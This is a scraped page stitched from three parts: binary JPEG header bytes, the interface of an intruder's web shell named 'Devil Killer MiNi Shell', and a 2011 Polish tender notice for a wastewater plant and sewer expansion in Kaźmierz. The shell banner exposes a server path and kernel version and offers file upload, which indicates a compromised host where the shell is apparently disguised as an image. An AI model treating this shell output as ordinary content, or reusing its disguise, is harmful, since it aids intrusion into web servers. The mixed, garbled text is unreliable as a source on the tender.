JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/151391-N-2011.html

<p class="kh_header"><b>Kaźmierz: ROZBUDOWA OCZYSZCZALNI ŚCIEKÓW W KIĄCZYNIE WRAZ Z SIECIĄ KANALIZACJI SANITARNEJ (tzw. UKŁAD KAŹMIERZ-KIĄCZYN) - etap I</b><br>
<b>Numer ogłoszenia: 151391 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Kaźmierz , ul. Szamotulska 20, 64-530 Kaźmierz, woj. wielkopolskie, tel. 061 2918065, faks 061 2918320.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kazmierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA OCZYSZCZALNI ŚCIEKÓW W KIĄCZYNIE WRAZ Z SIECIĄ KANALIZACJI SANITARNEJ (tzw. UKŁAD KAŹMIERZ-KIĄCZYN) - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

1.Rozbudowa oczyszczalni ścieków w miejscowości Kiączyn wraz z rozruchem z obecnej przepustowości Qdśr = 314 m3/d do Qdśr = 890 m3/d. Liczba mieszkańców równoważnych 4796.  Odbiornikiem ścieków oczyszczonych będzie kanał Bytyński, a dalej rzeka Sama. Jakość ścieków oczyszczonych musi być zgodna z załącznikiem nr 1 Rozporządzenia Ministra Środowiska z dnia 24.07.2006r. w sprawie warunków jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz  w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. Nr 137 poz. 984 z 2006r.) dla RLM od 2000 - 9999 oraz warunkami pozwolenia wodno prawnego. Wykonawca jest zobowiązany w ramach  realizacji przedmiotu zamówienia uzyskać pozwolenie wodno prawne na zrzut ścieków oczyszczonych do istniejącego wylotu wprowadzającego ścieki do Kanału Bytyńskiego. 
Biologiczno - mechaniczna oczyszczalnia ścieków pracująca w oparciu o osad czynny niskoobciążony wykonana w konstrukcji stalowej, wyniesiona, składać się będzie                    z następujących elementów: 
- obiektu dla ścieków dowożonych złożony ze zbiornika oraz budynku z urządzeniem podczyszczającym oraz wyposażeniem do odbioru
- przepompowni głównej
- oczyszczalni mechanicznej wyposażonej w zblokowane urządzenie oczyszczające złożone z sita i piaskownika
- oczyszczalnia biologiczna złożona z komór napowietrzania i układem dmuchaw oraz komór stabilizacji i osadników wtórnych z kaskadą
- układ odwadniania i higienizacji osadu
- komora ścieków oczyszczonych, komora pomiarowa
- sieci technologiczne i wod - kan

2.Likwidacja istniejącej oczyszczalni ścieków w Kaźmierzu położonej na dz. nr 291/2. Obiekty przeznaczone do rozbiórki to 2 biobloki Mu 100, 2 laguny osadowe, stalowy barak socjalny i kontener wojskowy, przepompownia, rurociągi technologiczne, ogrodzenie, osprzęt oczyszczalni. Przepustowość istniejącej oczyszczalni  Qdśr = 130 m3/d. W ramach rozbiórki należy wywieźć i zagospodarować powstałe odpady zgodnie z obowiązującymi przepisami ustawy o odpadach. Na rozbiórkę oczyszczalni Inwestor posiada pozwolenie Starosty Szamotulskiego nr 1123/09 z dnia 15.12.2009r.

3.Wykonanie sieci kanalizacji sanitarnej o łącznej długości ok. 3586 mb:
- kanały sanitarne grawitacyjne PVC o średnicy 315 mm - 2314 mb, w tym wymiana odcinka kanalizacji grawitacyjnej o długości 1180 mb
- kanały sanitarne ciśnieniowe PE o średnicach 250, 200, 225,180 mm -  1272 mb,               w tym przejście przewiertem sterowanym pod rzeką Samą o długości 288,5 mb od węzła 43 do węzła 45.
- pompownie ścieków P3, P7 i P9 
W ramach zadnia nie przewiduje się wykonania przyłączy. 
W kosztach przejścia pod dnem rzeki przewidzieć należy wykonanie badań hydrogeologicznych, potwierdzających brak przeszkód na trasie projektowanego rurociągu w postaci np. kamieni czy głazów. 
O rozpoczęciu robót związanych  z przejściem pod rzeką należy pisemnie powiadomić Wojewódzki Zarząd Melioracji i Urządzeń Wodnych Inspektorat Oborniki  oraz Poznański Związek Spółek Wodnych w Poznaniu oraz zapewnić nadzór tych jednostek nad wykonaniem i odbiorem robót - zgodnie z wydanym przez Starostę Szamotulskiego pozwoleniem wodno prawnym z dnia 28.01.2009r. 

Na roboty budowlane rozbudowy oczyszczalni ścieków w Kiączynie i sieci kanalizacji sanitarnej inwestor posiada pozwolenie na budowę wydane przez Starostę szamotulskiego nr 153/09 z dnia 27 lutego 2009r. Roboty budowlane Wykonawca jest zobowiązany prowadzić w sposób gwarantujący ciągłą prace oczyszczalni ścieków w Kiączynie. Przepięcie kanalizacji sanitarnej doprowadzającej obecnie ścieki na oczyszczalnię w Kaźmierzu nastąpić powinno w takim momencie rozbudowy obiektu w Kiączynie aby zapewnić prawidłowe oczyszczenie ścieków z terenu przepinanego Kaźmierza na oczyszczalni w Kiączynie. Po zakończeniu robót związanych z wykonaniem sieci kanalizacji grawitacyjnej Wykonawca wykona kamerownie światła przewodów kanalizacyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.21.27-4, 45.23.24.23-3, 45.23.24.10-9, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 200 000,00 zł (słownie:dwieścietysięcyzłotych).
2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
BS Duszniki O Kaźmierz           Nr 83907200020200027320000005
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	Do oferty należy dołączyć dokument potwierdzający wniesienie wadium. 

 W przypadku wniesienia wadium w formie innej niż pieniądz Zamawiający wymaga złożenia oryginału  dokumentu (Zamawiający zaleca aby w tym przypadku oryginał dokumentu załączyć oddzielnie do złożonej oferty np. w dodatkowej kopercie z opisem WADIUM)

7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na: 
- budowie, rozbudowie, przebudowie lub modernizacji co najmniej jednej  oczyszczalni ścieków o przepustowości minimum 900 m3/dobę i o wartości robót nie mniejszej niż 3 000 000,00 PLN z podaniem ich wartości, dat wykonania oraz odbiorców. 
- realizacji co najmniej jednej roboty, której przedmiotem było wykonanie sieci kanalizacji sanitarnej grawitacyjnej o długości co najmniej 2000 m z podaniem ich wartości, dat wykonania oraz odbiorców.
- realizacji co najmniej jednej roboty, której przedmiotem było wykonanie sieci kanalizacji sanitarnej ciśnieniowej o długości co najmniej 1000 m z podaniem ich wartości, dat wykonania oraz odbiorców.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowaniem, w celu wykonania zamówienia, osobami posiadającymi uprawnienia do kierowania robotami budowlanymi o następujących specjalnościach: 

a)	Kierownik Budowy - posiadający następujące kwalifikacje:

- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub inne ważne uprawnienia do kierowania robotami budowlanymi, w specjalności instalacyjno-inżynieryjnej w zakresie instalacji i urządzeń do ochrony wód  wydane na podstawie wcześniej obowiązujących przepisów, 
- co najmniej 5 lat doświadczenia zawodowego (liczone od dnia uzyskania uprawnień) na stanowisku Kierownika Budowy,
- kierowanie budową/rozbudową/modernizacją/przebudową co najmniej jednej oczyszczalni ścieków o przepustowości minimum 900 m3/d,
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydany przez tę izbę.

b) Kierownik Robót Sanitarnych - posiadający następujące kwalifikacje:

- co najmniej 3 lata doświadczenia zawodowego liczonego od momentu uzyskania uprawnień budowlanych, w kierowaniu robotami instalacyjnymi sanitarnymi,
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub inne ważne uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, wydane na podstawie wcześniej obowiązujących przepisów,
-  aktualny wpis na listę członków właściwej izby samorządu zawodowego wydany przez tę izbę.

c)Kierownik Robót Elektrycznych i AKPiA- posiadający następujące kwalifikacje:

- co najmniej 3 lata doświadczenia zawodowego liczonego od momentu uzyskania uprawnień budowlanych, w kierowaniu robotami instalacyjnymi elektrycznymi,
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub  inne ważne uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych wydane na podstawie wcześniej obowiązujących przepisów,
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydany przez tę izbę.

d) Kierownik Robót Konstrukcyjno-Budowlanych - posiadający następujące kwalifikacje:

- co najmniej 3 lata doświadczenia zawodowego liczonego od momentu uzyskania uprawnień budowlanych, w kierowaniu robotami konstrukcyjno-budowlanymi,
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub inne ważne uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej wydane na podstawie wcześniej obowiązujących przepisów
- aktualny wpis na listę członków właściwej izby samorządu zawodowego wydany przez tę izbę.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 6 000 000,00 PLN.

2)Posiadanie środków finansowych w wysokości co najmniej 4 000 000,00 PLN lub posiadanie zdolności kredytowej w wysokości co najmniej 4 000 000,00 PLN
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Do oferty należy dołączyć kosztorysy ofertowe sporządzone zgodnie z kolejnością pozycji zamieszczoną w przedmiarach robót.

2.Do oferty należy dołączyć wypełniony harmonogram rzeczowo-finansowy realizacji inwestycji.

3.W przypadku proponowania urządzeń równoważnych Wykonawca dołączy do oferty następujące informacje producenta urządzeń:

1.       Przepompownie:
nazwa i typ producenta,
karta katalogowa,
obliczenia hydrauliczne,
wykonanie materiałowe
typ separacji części stałych - budowa separatorów,
rysunek komory suchej z rozmieszczeniem urządzenia
rysunek zbiornika wraz z gabarytami (średnica, wymiary - wysokość części walcowej, wysokość całkowita, zajmowana powierzchnia, głębokość zabudowy),
rysunek pokazujący ilość, średnicę i rozmieszczenie włazów oraz króćców przyłączeniowych
schemat instalacji sterującej automatyką,
2.Z1 Sito pionowe w przepompowni głównej 
 - nazwa i typ producenta
- karta katalogowa 
- wykonanie materiałowe
- umiejscowienie kosz cedzącego, średnica, perforacja,
- opis strefy zagęszczania i prasowania skratek
- opis regulacji docisku szczotki czyszczącej do bębna cedzącego
- opis transportu skratek, rodzaj spirali i połączenia osiowego wstęg spirali
- sposób czyszczenie sita, rozwiązanie materiałowe  szczotki , sposób montowania szczotki
- opis komory pomiarowo-przelewowej 
- pomiar poziomu ścieków 
- opis rynny zrzutowej odwodnionych skratek 
- opis szafy sterowniczej, sposób sterowania 
- opis ogrzewania sita i izolacji termicznej
- rysunek montażowy urządzenia
- wytyczne branżowe

3.Z2 Zblokowane urządzenie odbioru i podczyszczania ścieków dowożonych 
- nazwa i typ producenta
- karta katalogowa       
- wykonanie materiałowe
- opis sita, sposobu umiejscowienia kosz cedzącego, średnica, perforacja
- sposób transportu skratek, 
- sposób czyszczenie sita, rozwiązanie materiałowe  szczotki , sposób montowania szczotki
- opis komory pomiarowo-przelewowej 
- pomiar poziomu ścieków 
- opis rynny zrzutowej odwodnionych skratek 
- opis szafy sterowniczej, sposób sterowania 
- opis piaskownika, zgarniacza piasku, sprawność usuwania piasku
- opis płuczki piasku
- rysunek montażowy urządzenia
-szczegółowy opis układu odbioru ścieków z wozu asenizacyjnego, zakres dostawy, sterowania, archiwizacji
- wytyczne branżowe

